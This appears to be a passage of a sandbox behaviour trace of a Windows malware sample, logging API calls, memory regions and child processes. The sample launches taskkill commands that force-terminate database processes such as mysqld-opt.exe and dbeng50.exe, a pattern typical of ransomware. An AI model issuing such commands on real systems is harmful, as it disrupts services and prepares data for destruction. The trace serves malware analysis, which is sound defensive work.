lpStartupInfo=0x19f760*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x13c, hStdOutput=0x140, hStdError=0x144)) [0193.631] GetProcessHeap () returned 0x500000 [0193.631] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x507690 [0193.632] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0193.632] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0193.632] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0193.632] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0193.632] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0193.632] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0193.632] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0193.632] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0193.632] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0193.632] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0193.632] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0193.632] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0193.632] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0193.632] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0193.632] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0193.632] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0193.632] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0193.632] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0193.632] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0193.632] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0193.632] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0193.632] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0193.632] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0193.632] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0193.632] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0193.632] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0193.632] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0193.633] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0193.633] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0193.633] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0193.633] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0193.633] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0193.633] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0193.633] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0193.633] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0193.633] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0193.633] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0193.633] GetProcessHeap () returned 0x500000 [0193.633] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x507690) returned 1 [0193.633] GetProcessHeap () returned 0x500000 [0193.633] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0xa) returned 0x50b128 [0193.633] lstrcmpW (lpString1="\\taskkill.exe", lpString2="\\XCOPY.EXE") returned -1 [0193.637] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\taskkill.exe", lpCommandLine="taskkill /f /im mysqld-opt.exe ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpStartupInfo=0x19f6b0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="taskkill /f /im mysqld-opt.exe ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19f6fc | out: lpCommandLine="taskkill /f /im mysqld-opt.exe ", lpProcessInformation=0x19f6fc*(hProcess=0x9c, hThread=0x98, dwProcessId=0x97c, dwThreadId=0x818)) returned 1 [0193.654] CloseHandle (hObject=0x98) returned 1 [0193.654] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0193.654] GetProcessHeap () returned 0x500000 [0193.655] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x509d58) returned 1 [0193.655] GetEnvironmentStringsW () returned 0x509d58* [0193.655] GetProcessHeap () returned 0x500000 [0193.655] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0xa76) returned 0x507cc8 [0193.655] FreeEnvironmentStringsA (penv="=") returned 1 [0193.656] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0xffffffff) returned 0x0 [0195.048] GetExitCodeProcess (in: hProcess=0x9c, lpExitCode=0x19f694 | out: lpExitCode=0x19f694*=0x80) returned 1 [0195.048] CloseHandle (hObject=0x9c) returned 1 [0195.049] _vsnwprintf (in: _Buffer=0x19f77c, _BufferCount=0x13, _Format="%08X", _ArgList=0x19f69c | out: _Buffer="00000080") returned 8 [0195.049] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000080") returned 1 [0195.049] GetProcessHeap () returned 0x500000 [0195.050] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x507cc8) returned 1 [0195.050] GetEnvironmentStringsW () returned 0x50b178* [0195.050] GetProcessHeap () returned 0x500000 [0195.050] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0xa9c) returned 0x507cc8 [0195.050] FreeEnvironmentStringsA (penv="=") returned 1 [0195.050] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0195.050] GetProcessHeap () returned 0x500000 [0195.050] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x507cc8) returned 1 [0195.050] GetEnvironmentStringsW () returned 0x50b178* [0195.050] GetProcessHeap () returned 0x500000 [0195.050] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0xa9c) returned 0x507cc8 [0195.051] FreeEnvironmentStringsA (penv="=") returned 1 [0195.051] GetProcessHeap () returned 0x500000 [0195.051] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x50b128) returned 1 [0195.051] DeleteProcThreadAttributeList (in: lpAttributeList=0x19f728 | out: lpAttributeList=0x19f728) [0195.051] _get_osfhandle (_FileHandle=1) returned 0x140 [0195.051] SetConsoleMode (hConsoleHandle=0x140, dwMode=0x0) returned 0 [0195.051] _get_osfhandle (_FileHandle=1) returned 0x140 [0195.051] GetConsoleMode (in: hConsoleHandle=0x140, lpMode=0xf3f40c | out: lpMode=0xf3f40c) returned 0 [0195.051] _get_osfhandle (_FileHandle=0) returned 0x13c [0195.051] GetConsoleMode (in: hConsoleHandle=0x13c, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0195.051] GetConsoleOutputCP () returned 0x1b5 [0195.052] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0195.053] SetThreadUILanguage (LangId=0x0) returned 0x409 [0195.056] exit (_Code=128) Thread: id = 273 os_tid = 0xfac Process: id = "51" image_name = "taskkill.exe" filename = "c:\\windows\\syswow64\\taskkill.exe" page_root = "0x2fad0000" os_pid = "0x97c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "50" os_parent_pid = "0xc40" cmd_line = "taskkill /f /im mysqld-opt.exe " cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3784 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3785 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3786 start_va = 0x40000 end_va = 0x43fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3787 start_va = 0x50000 end_va = 0x65fff monitored = 0 entry_point = 0x5de80 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\SysWOW64\\taskkill.exe" (normalized: "c:\\windows\\syswow64\\taskkill.exe") Region: id = 3788 start_va = 0x70000 end_va = 0x406ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 3789 start_va = 0x4070000 end_va = 0x4084fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004070000" filename = "" Region: id = 3790 start_va = 0x4090000 end_va = 0x40cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004090000" filename = "" Region: id = 3791 start_va = 0x40d0000 end_va = 0x410ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040d0000" filename = "" Region: id = 3792 start_va = 0x4110000 end_va = 0x4110fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004110000" filename = "" Region: id = 3793 start_va = 0x4120000 end_va = 0x4121fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 3794 start_va = 0x4200000 end_va = 0x43fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004200000" filename = "" Region: id = 3795 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3796 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 3797 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3798 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3799 start_va = 0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 3800 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3801 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 3802 start_va = 0x4540000 end_va = 0x454ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004540000" filename = "" Region: id = 3803 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3804 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3805 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3806 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3807 start_va = 0x4550000 end_va = 0x469ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004550000" filename = "" Region: id = 3808 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3809 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3810 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3811 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 3812 start_va = 0x4130000 end_va = 0x41edfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3813 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3814 start_va = 0x74650000 end_va = 0x746cafff monitored = 0 entry_point = 0x7466e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 3815 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3816 start_va = 0x4400000 end_va = 0x443ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 3817 start_va = 0x4440000 end_va = 0x447ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004440000" filename = "" Region: id = 3818 start_va = 0x76ae0000 end_va = 0x76b23fff monitored = 0 entry_point = 0x76af9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3819 start_va = 0x75260000 end_va = 0x7530cfff monitored = 0 entry_point = 0x75274f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3820 start_va = 0x74450000 end_va = 0x7446dfff monitored = 0 entry_point = 0x7445b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3821 start_va = 0x74440000 end_va = 0x74449fff monitored = 0 entry_point = 0x74442a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3822 start_va = 0x74590000 end_va = 0x745e7fff monitored = 0 entry_point = 0x745d25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 3823 start_va = 0x77450000 end_va = 0x77596fff monitored = 0 entry_point = 0x77461cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3824 start_va = 0x76b30000 end_va = 0x76c7efff monitored = 0 entry_point = 0x76be6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3825 start_va = 0x753c0000 end_va = 0x75451fff monitored = 0 entry_point = 0x753f8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 3826 start_va = 0x77290000 end_va = 0x7744cfff monitored = 0 entry_point = 0x77372a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 3827 start_va = 0x75310000 end_va = 0x7536efff monitored = 0 entry_point = 0x75314af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 3828 start_va = 0x77240000 end_va = 0x77284fff monitored = 0 entry_point = 0x7725de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 3829 start_va = 0x6cda0000 end_va = 0x6cda7fff monitored = 0 entry_point = 0x6cda17b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 3830 start_va = 0x6cd80000 end_va = 0x6cd95fff monitored = 0 entry_point = 0x6cd821d0 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 3831 start_va = 0x6ccb0000 end_va = 0x6cceefff monitored = 0 entry_point = 0x6ccc46c0 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 3832 start_va = 0x6c9a0000 end_va = 0x6cadefff monitored = 0 entry_point = 0x6c9cd880 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 3833 start_va = 0x6cd60000 end_va = 0x6cd7bfff monitored = 0 entry_point = 0x6cd64720 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 3834 start_va = 0x6cd50000 end_va = 0x6cd59fff monitored = 0 entry_point = 0x6cd528d0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 3835 start_va = 0x46a0000 end_va = 0x488ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000046a0000" filename = "" Region: id = 3836 start_va = 0x4480000 end_va = 0x44a9fff monitored = 0 entry_point = 0x4485680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3837 start_va = 0x46a0000 end_va = 0x4827fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000046a0000" filename = "" Region: id = 3838 start_va = 0x4880000 end_va = 0x488ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004880000" filename = "" Region: id = 3839 start_va = 0x74ea0000 end_va = 0x74ecafff monitored = 0 entry_point = 0x74ea5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3840 start_va = 0x4890000 end_va = 0x4a10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004890000" filename = "" Region: id = 3841 start_va = 0x4a20000 end_va = 0x5e1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004a20000" filename = "" Region: id = 3842 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3843 start_va = 0x41f0000 end_va = 0x41f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000041f0000" filename = "" Region: id = 3844 start_va = 0x4480000 end_va = 0x4484fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "taskkill.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\taskkill.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\taskkill.exe.mui") Region: id = 3845 start_va = 0x4490000 end_va = 0x4490fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004490000" filename = "" Region: id = 3846 start_va = 0x44a0000 end_va = 0x44a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044a0000" filename = "" Region: id = 3847 start_va = 0x5e20000 end_va = 0x6156fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3848 start_va = 0x6160000 end_va = 0x6249fff monitored = 0 entry_point = 0x619d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 3849 start_va = 0x44b0000 end_va = 0x44b3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044b0000" filename = "" Region: id = 3850 start_va = 0x6160000 end_va = 0x623ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 3851 start_va = 0x76e20000 end_va = 0x76e2bfff monitored = 0 entry_point = 0x76e23930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 3852 start_va = 0x44c0000 end_va = 0x44c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044c0000" filename = "" Region: id = 3853 start_va = 0x76c80000 end_va = 0x76d03fff monitored = 0 entry_point = 0x76ca6220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 3854 start_va = 0x44d0000 end_va = 0x44d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044d0000" filename = "" Region: id = 3855 start_va = 0x6cca0000 end_va = 0x6ccacfff monitored = 0 entry_point = 0x6cca3520 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 3856 start_va = 0x6cc30000 end_va = 0x6cc96fff monitored = 0 entry_point = 0x6cc4b610 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 3857 start_va = 0x740f0000 end_va = 0x7410afff monitored = 0 entry_point = 0x740f9050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 3858 start_va = 0x6cbe0000 end_va = 0x6cc23fff monitored = 0 entry_point = 0x6cbfaaf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 3859 start_va = 0x44e0000 end_va = 0x451ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044e0000" filename = "" Region: id = 3860 start_va = 0x4550000 end_va = 0x458ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004550000" filename = "" Region: id = 3861 start_va = 0x45a0000 end_va = 0x469ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000045a0000" filename = "" Region: id = 3862 start_va = 0x4830000 end_va = 0x486ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004830000" filename = "" Region: id = 3863 start_va = 0x6240000 end_va = 0x627ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006240000" filename = "" Region: id = 3864 start_va = 0x6280000 end_va = 0x62bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006280000" filename = "" Region: id = 3865 start_va = 0x62c0000 end_va = 0x62fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000062c0000" filename = "" Region: id = 3866 start_va = 0x6cbc0000 end_va = 0x6cbd0fff monitored = 0 entry_point = 0x6cbc8fa0 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 3867 start_va = 0x6c8e0000 end_va = 0x6c99efff monitored = 0 entry_point = 0x6c911e80 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 3868 start_va = 0x4520000 end_va = 0x4525fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004520000" filename = "" Thread: id = 274 os_tid = 0x818 Thread: id = 275 os_tid = 0x8d8 Thread: id = 276 os_tid = 0x13fc Thread: id = 277 os_tid = 0x364 Thread: id = 278 os_tid = 0x13f8 Process: id = "52" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x2f705000" os_pid = "0x9b4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x110c" cmd_line = "cmd.exe /c \"taskkill /f /im dbeng50.exe \"" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3870 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3871 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3872 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3873 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 3874 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 3875 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 3876 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" 